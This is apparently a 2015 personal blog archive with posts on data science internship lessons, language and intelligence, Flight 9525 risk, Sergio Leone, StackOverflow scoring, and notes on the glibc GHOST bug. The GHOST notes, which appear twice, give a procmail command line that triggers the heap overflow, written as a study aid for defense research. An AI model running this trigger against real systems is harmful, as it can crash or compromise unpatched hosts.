(v0.1 - 2015/11/10)
I've been working as a data scientist intern for several months now. Here, I want to summarize a little bit on my experience, and also list several things that I found important. Hopefully, I will achieve these goals soon:)
I think there are several tasks for data scientists, including analysis, research, building internal data products and building external data products. The goal for analysis is mainly answer some direct business and engineering questions. A data scientist can expect to receive various questions from different teams constantly. Research tries to tackle more difficult and complex questions in order to provide deeper insights. Then, some of the analysis or research results could be turned into internal data products, mostly as internal web services. Thus, other members in the company can reuse the analysis for their tasks. Finally, if the methodology is reliable and the result is good, we can release the data service as part of the company's product to the outside world!
In a large company, each person can specialize in a particular area. While in a small company, the data scientist typically needs to be good at everything (full snack?). But I think no matter the size of the company, the following goals are always important:
1. Code Quality. Many people think that the data code only needs to run once, so one can just write it in an ad hoc way. But this is not true based on my experience. The code will be reused and the project will become more and more complex. So all the software engineering wisdom needs to be applied in data code as well. Some extra investment in the beginning will save significant amount of work later on.
2. Use Established Tools. One way to produce high quality code and save time is to use established tools. This both includes development tools (e.g. IPython) and data science libraries (e.g. pandas).
3. Communication. Before working on a problem, it would be important to clearly understand the purpose and desired outcome. A lot of the time, the requester might not fully understand the complexity of the data. So some simple measures, such as mean, might not work as expected. After the job is done, it is also important to convey the result to other people. The write up, in the form of an email or slides, needs to be accurate and concise.
4. Feedback. Actively seek feedback from different types of people. Engineers, sales, customer managers, etc., all give very good and diverse comments. The comments could help you improve the workflow and get new ideas. If working on some data products, create an early demo and seek early feedback.
5. Learning. There are several aspects related to learning. First, one shall learn about what's going on inside the company in order to actively find new opportunities of applying data analysis. Some folks might not realize that their tasks can be helped by a data scientist. Second, one shall improve its skills, including statistics, machine learning, etc. Third, one need to search for related work of the current project. Some data tasks are unique, but many others are similar. So learning from other people's experience can significantly facilitate one's own projects.
6. Planning. Apparently, there are many questions waiting to be answered, just like there are many development tickets to be addressed. My experience is that it is usually hard to finish all of them. So one needs to prioritize. Also, in the beginning of a project, always start with a simple solution. A "bad habit" for people from academia is that they tend to make things over complex... Complexity is sometime required to get your paper published, but it is usually not a friend in a company.
I did not talk about big data, because the dataset I am focusing on is rather small. But again, I would say no matter the size of the data, these goals always applies. In addition, the trend of technology is hiding more details of lower levels, so that people can put more effort in building the tower of technology higher. That means in the future, the interface for analyzing small and big data would be pretty much similar.
Some interesting data science article and data blogs:
[1] The Top Mistakes Developers Make When Using Python for Big Data Analytics
https://www.airpair.com/python/posts/top-mistakes-python-big-data-analytics#3-mistake-2-not-tuning-for-performance
[2] Data Scientist: The Sexiest Job of the 21st Century
https://hbr.org/2012/10/data-scientist-the-sexiest-job-of-the-21st-century/
[3] Data Research from OkCupid
http://blog.okcupid.com
Tuesday, November 10, 2015
Saturday, September 12, 2015
Language and Intelligence
Part 1 International Students
I learned from my girlfriend and her friend that your language ability determines your intelligence, particularly for an international student. Intelligence can be decomposed into two parts. The first part is whether you can understand some materials and come up with good ideas, which I assume should not be difficult for many students. The second part is whether you can convey your thoughts to others (intelligence). Unfortunately, I found that many international students, including myself, are struggling, because our ability to speak the language (e.g. English), can sometime significantly limits how we express our understanding and ideas. This could give others an impression that this guy is not intelligent. Or think about an extreme case where I was thrown to Moscow. Without knowing a single word in Russian, I cannot express anything through language. So to the Russians, I am equivalent to a complete idiot.
So it is very important to improve one's language to improve the perception of one's language by others.
Part 2 Mathematics
Many people say math is hard, and they cannot learn math well because there are not that intelligent. But it might be the case that they have the intelligence to learn math, but they do not have the language to read math. Using the example in Part 1, if I am in Moscow, I cannot book a hotel or visit the hospital, although nobody would consider these two tasks are beyond a normal human being. I cannot do these things because I don't know Russian. Similarly, you cannot do math if you don't know the language. The language of math looks a little bit intimidating, but I think it should not be more difficult than a human language (might be related to Chomsky hierarchy [2]). So I think people who are afraid of learning math can just view it as learning a new language. Learning a new language requires constant input and practice, so this explains why we should learn things (e.g. math) constantly as well.
References:
[1] The Figure. http://edl.ecml.at/Portals/33/images/EDL_Logo1.jpg
[2] https://en.wikipedia.org/wiki/Chomsky_hierarchy
Thursday, March 26, 2015
Risk Analysis of the Flight 9525
The crash of Germanwings Flight 9525 is really a great tragedy. It is even more sad to remember that there were multiple large-scale aviation accidents, including MH370, MH17 and TNA222, in the past two years. Many people, including myself, would wish that we can have better technologies and policies to reduce the likelihood of such events or even prevent them completely.
In the ongoing investigation of the Flight 9525 accident, we learn that the co-pilot locked the cockpit while the caption was outside, and then brought down the plane. The exact motive of the co-pilot is unknown. Apparently, airlines have tests the mental conditions of pilots, but currently there is no report indicating that the co-pilot is abnormal [1].
In this article, I would like to discuss how we might be able to decrease the risk of such accident. I am inspired by the following article written by professor Juliette Kayyem [2]: Was 9/11 safety precaution a flaw? From the title, we can already know one main point of that article: the cockpit lock-up mechanism designed to prevent 9/11-style attack becomes a problem when one of the pilots goes wrong. The author has suggested to have an emergence password so that no one can block the access to the cockpit. I definitively think this is a good idea, but we should think deeper by considering the risks of different threats, and how these risks tangle together.
There are many threats to an airplane: hijacking, mechanical errors, pilot errors and malicious pilots. Each threat has a risk value which can be simply calculated as likelihood * impact. We will only focus on the likelihood part in this article. We want to reduce the likelihood of every threat to be lower than certain threshold. However, this case clearly shows the difficulty, because one mechanism that reduces the likelihood of a threat (e.g. hijacking in this case) could increase the likelihood of another threat (e.g. malicious pilot). In this particular case, the cockpit lock-up mechanism is not good because the likelihood of malicious pilot has been increased above the threshold.
One might think it is necessary to have the lock-up mechanism to defend against hijackers, and we have to sacrifice on other aspects. But I don't think so. I think there are many other ways to reduce the likelihood of hijacking, such as security check points, on-board security guards which I've seen in Chinese domestic flights several years ago, and background check of passengers. This line of defenses are probably able to reduce the likelihood of hijacking to an acceptable level. On the other hand, however, we do not have reliable methods to prevent malicious pilots. As we have discussed previously, mental tests are not useful in this case at least. And due to the complexity of this job, we have to give many authorities to the pilots. Being able to unlock the cockpit, therefore, become an important defense line for malicious pilots. But unfortunately, this defense line was turned off for Flight 9525...
Another idea is to consider self-flying airplanes. After all, we already have self-driving cars. At least, the airplane could become a remotely controlled drone in emergence. This would not only help Flight 9525, but other cases when the pilots lost conscious, such as the Helios Airways Flight 522. But having an self-flying system introduces new threats such as software bugs or even vulnerabilities, which are major threats of all kinds of digital systems now. Should we trust human or machine?
References:
[1] Lufthansa CEO: Germanwings copilot passed medical exams http://www.cnn.com/2015/03/26/europe/lufthansa-ceo-germanwings-crash/index.html
[2] http://www.cnn.com/2015/03/26/opinions/kayyem-germanwings-co-pilot/index.html
Sunday, February 15, 2015
The Path of Sergio Leone
(v0.1)
Sergio Leone is one of my favorite movie directors. One can definitely attribute his success to genius and hard working. However, I think it is also interesting to take a look at his path of making films, as we might be able to learn something from it.
He has roughly made 10 films over 25 years (1959 - 1984) [1]. His first two films were rather bad according to the rating on imdb. However, these two films probably gave him enough experience to make a better one. So he made the third one, a Fistful of Dollars, in 1964. This movie was a huge success, but with one problem: he basically plagiarized the story of Yojimbo, by Akira Kurosawa. Personally, I am fine with his deed, because he made a great film after all, and he has compensated Akira. But more importantly, I think this step might be necessary for a young director like him, as he lack the experience of writing a good story. Such imitation is probably the fastest way to become a master.
Since the 1964 movie was a huge success, the wise idea is to make sequels of it. It can hone his ability further and get reputation and money quicker, with very little risk. So we have For a Few Dollars More (1965) and The Good, the Bad and the Ugly (1966). Then, Leone was already a mature director, and it was the time to climb the high mountain in his life. The previous three movies are all Western, but the stories are constrained by each other. He needed to break out from the trilogy in order to fully exploit his creativity, while also utilize his experience in Western films. So he directed the Once Upon a Time in the West in 1968, which is one of the greatest movies of all time. This movie also made him one of the greatest directors.
The four films had probably exhausted his creativity in Western settings, so his eye turned to the past of Mexico and produced Once Upon a Time... the Revolution in 1971. It is also a great movie, because at this time, Leone already reached the top level, so it was impossible to make a low quality one anymore.
Then in the next 13 years, he stopped directing. It probably because he was tired and needed some rest. Also, he was preparing the next big shot. The next movie, finally arrived at 1984, was in a completely different setting compared to all his previous films. It is the Once Upon a Time in America which describes the lives of several gangsters in the New York City. I personally think this movie has reached the apex of filmography. The story, the acting, the scenes, the music ... are all the best. He is a true master.
Then, of course, we just need to expect one masterpiece after another from him, until his death. However, the ending of his life came rather soon because his body cannot catch up with his great mind. He died at 1989 when preparing Leningrad: The 900 Days.
I think he had a fantastic life with invaluable contributions to the humanity. I also think his path is similar to many great minds in other fields, such as academia (e.g. replacing films with research publications in the main text). I hope we all can get some inspirations from the paths of these forebears.
Additional remarks:
- We should also emphasize the contribution of Ennio Morricone, who made superb music for Leone's movies. Their life long collaboration is also worth remembering.
References:
[1] http://en.wikipedia.org/wiki/Sergio_Leone#Filmography
Saturday, January 31, 2015
Notes on the GHOST Bug
The recent GHOST bug discovered in glibc is a heap buffer overflow that could potentially lead to arbitrary code execution. I am interested to learn about this bug because I am working on heap buffer overflow defense. So I read the post written by Qualys Security Advisory, which really provides excellent explanation of it! [1]
This article just contains some of my notes when learning this bug. Hope they will also be helpful to others and please feel free to provide your comments.
(1) Why can't we detect this bug earlier?
It has been said that this bug existed since 2000. So an important question is why can't we detect it earlier? The article written by Qualys indicates that they found it through a manual code review. So probably the code has not received enough eyeballs previously.
On the other hand, I also think this bug is fairly easy to be detected by fuzzing. Because it is actually very easy to create test inputs and the oracle in this case. On the other hand, it is probably not easy to find the Heartbleed vulnerability through fuzzing, because both the test inputs and the oracle are hard to build.
I have wrote the following simple program that could trigger the vulnerability. We can think it as a very simple fuzzer.
https://github.com/movingname/Toys/blob/master/C/GHOST2.c
We can use the AddressSanitizer as the oracle. So I used clang + AddressSanitizer to compile it. Then when I ran it, AddressSanitizer indeed reports a heap buffer overflow.
I guess one could do a round of fuzzing for all this kind of functions in libraries. Maybe more bugs can be found?
(2) procmail exploit
The article [1] shows how we can exploit this bug in procmail using
/usr/bin/procmail 'VERBOSE=on' 'COMSAT=@...ython -c "print '0' * $((0x500-16*1-2*4-1-4))"` < /dev/null
However, this command has some omissions (the ... in the middle). Actually, one can run
/usr/bin/procmail 'VERBOSE=on' 'COMSAT=@'`python -c "print '0' * $((0x500-16*1-2*4-1-4))"` < /dev/null
to trigger the glibc detection.
In addition, the length of the input is important. Apparently it cannot be too small. But it also cannot be too large because procmail will detect the overflow. there is a tiny window that will trigger the overflow.
References:
[1] http://www.openwall.com/lists/oss-security/2015/01/27/9
This article just contains some of my notes when learning this bug. Hope they will also be helpful to others and please feel free to provide your comments.
(1) Why can't we detect this bug earlier?
It has been said that this bug existed since 2000. So an important question is why can't we detect it earlier? The article written by Qualys indicates that they found it through a manual code review. So probably the code has not received enough eyeballs previously.
On the other hand, I also think this bug is fairly easy to be detected by fuzzing. Because it is actually very easy to create test inputs and the oracle in this case. On the other hand, it is probably not easy to find the Heartbleed vulnerability through fuzzing, because both the test inputs and the oracle are hard to build.
I have wrote the following simple program that could trigger the vulnerability. We can think it as a very simple fuzzer.
https://github.com/movingname/Toys/blob/master/C/GHOST2.c
We can use the AddressSanitizer as the oracle. So I used clang + AddressSanitizer to compile it. Then when I ran it, AddressSanitizer indeed reports a heap buffer overflow.
I guess one could do a round of fuzzing for all this kind of functions in libraries. Maybe more bugs can be found?
(2) procmail exploit
The article [1] shows how we can exploit this bug in procmail using
/usr/bin/procmail 'VERBOSE=on' 'COMSAT=@...ython -c "print '0' * $((0x500-16*1-2*4-1-4))"` < /dev/null
However, this command has some omissions (the ... in the middle). Actually, one can run
/usr/bin/procmail 'VERBOSE=on' 'COMSAT=@'`python -c "print '0' * $((0x500-16*1-2*4-1-4))"` < /dev/null
to trigger the glibc detection.
In addition, the length of the input is important. Apparently it cannot be too small. But it also cannot be too large because procmail will detect the overflow. there is a tiny window that will trigger the overflow.
References:
[1] http://www.openwall.com/lists/oss-security/2015/01/27/9
Thursday, January 15, 2015
Inflation and StackOverflow.com
(v0.1)
I really enjoy asking and answering questions on the StackOverflow.com, which has some exciting features. For example, it is mainly managed by the community, not the admin. So users on StackOverflow.com not only contributes information (Web 2.0), but also contributes "computation" (Web 3.0?). Another feature is the scoring system. A user can get scores based on votes of questions and answers she posts. This is a quite good incentive for users to offer there knowledge, because the score reflects one's progress and ability, and can be used in job interview. This second feature separates StackOverflow.com from traditional mail list based Q & A.
However, this reward mechanism also comes with an issue which I call it the disadvantage of late members. That is, it is more difficult for a late member to get the same amount of score than an early member. This is mainly because early questions are in general more important yet easier to answer than late questions. For example, user X asks how to sort a dictionary in Python. User Y easily answers this question. Since this question is quite common for new Python users, we can expect that many user will find this answer and give it a vote up. Y thus earns high score simply through a simple answer. Now after one year, Z enters StackOverflow.com. Z is much more knowledgeable in Python than Y, however, there are not such easy and rewarding questions for Z now. So Z's score might never go beyond Y's.
This issue could hurt the participation of such sites. New comers could lack strong incentive to make contributions, because they can hardly find questions to answer, and they cannot catch up with the early members anyway.
We can think about how to address this issue. I propose two simple ideas here. The first idea is to reduce the score of early members overtime. However, reducing one's "possession" sounds bad and might hurt the early members. A slightly different idea is to introduce inflation. That is, the Q & A site should increase the score for a vote up overtime, thus giving more scores to new members. Maybe the inflation in economy also serves similar purpose. After early some early people have accumulated a large amount of wealth, it would be hard for late people to catch up, because the rich people can have better return simply through safe investments such as government bond. Inflation, in some degree, could alleviate this issue.
Actually, the solution used by StackOverflow.com now is to have a recent ranking (e.g. in past year) together with overall ranking. The recent ranking would be a fairer play ground for everybody. However, the recent ranking is not as stable as the overall ranking, so I think the inflation idea still make sense. Of course, StackOverflow.com can complement the recent ranking with permanent badges (e.g. Top 1 in one month badge).
A related article:
Why I no longer contribute to Stackoverflow
http://michael.richter.name/blogs/why-i-no-longer-contribute-to-stackoverflow/
Subscribe to:
Posts (Atom)